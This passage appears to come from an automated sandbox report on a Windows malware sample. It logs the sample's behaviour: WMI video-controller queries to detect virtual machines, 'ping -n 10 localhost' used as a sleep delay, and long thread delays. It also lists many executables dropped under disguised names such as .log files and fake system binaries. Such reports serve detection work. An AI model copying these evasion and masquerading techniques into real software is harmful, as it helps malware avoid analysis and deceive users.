Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Recovery\ctfmon.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Memory allocated: 17A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Memory allocated: 1B480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Memory allocated: 2840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Memory allocated: 1A980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Memory allocated: 8C0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Memory allocated: 1A3F0000 memory reserve \| memory write watch
Source: C:\Recovery\ctfmon.exe	Memory allocated: 1100000 memory reserve \| memory write watch
Source: C:\Recovery\ctfmon.exe	Memory allocated: 1AD50000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Memory allocated: 1ADB0000 memory reserve \| memory write watch
Source: C:\Recovery\ctfmon.exe	Memory allocated: 20F0000 memory reserve \| memory write watch
Source: C:\Recovery\ctfmon.exe	Memory allocated: 1A4D0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Memory allocated: 1440000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Memory allocated: 1B050000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Memory allocated: B20000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Memory allocated: 1A620000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NJzXBuON.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mwFSlUNE.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UXfGEDIo.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aGreoIOy.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pDLUlABc.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PtwPpPmY.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OvnXGXyF.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RYXOEfJQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OsAnoSoB.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FUcZRGSD.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eoPexdBD.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZQiVzhgV.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PfChbXEz.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XYvNpROm.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nRXThXRl.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kEMLjtbD.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sNIJIutM.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eIOeVPZc.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xhUJVuRJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wSacHBjk.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VponRhip.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XwvpSNWN.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bbEWzzMV.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tngbTVgk.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yFCKRiMT.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AOCihfsW.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BeMjthTj.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eTxcBbyX.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UpgEQnOA.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DhgBcIwD.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zLwIlJoB.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qqitJWYB.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kxFTgqTN.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WWWWHnjp.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pRAsNhes.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\swusCNgs.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MbnYeHgo.log	Jump to dropped file
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vbkkEjci.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CdEzwRtl.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oHbTlmtF.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IuPYVmtj.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lHNctDZP.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yqvjUPym.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QKWXiCZs.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jLivJUwn.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mTPcyfdR.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DtUIufbH.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vPfJpCEr.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MwnZBuEN.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uPLTKmLa.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vmRteunU.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EfqhSByg.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IFwiuxEU.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zupqWouz.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MegGnYKL.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VeGplWJv.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gmTMvKjO.log	Jump to dropped file
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\njHMYZdD.log	Jump to dropped file
Source: C:\Recovery\ctfmon.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HpEyVDEi.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fdKvAzJi.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gHPdZtTT.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\koiTwEAQ.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vnARymaC.log	Jump to dropped file

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\ctfmon.exe TID: 2024	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Recovery\ctfmon.exe TID: 1008	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
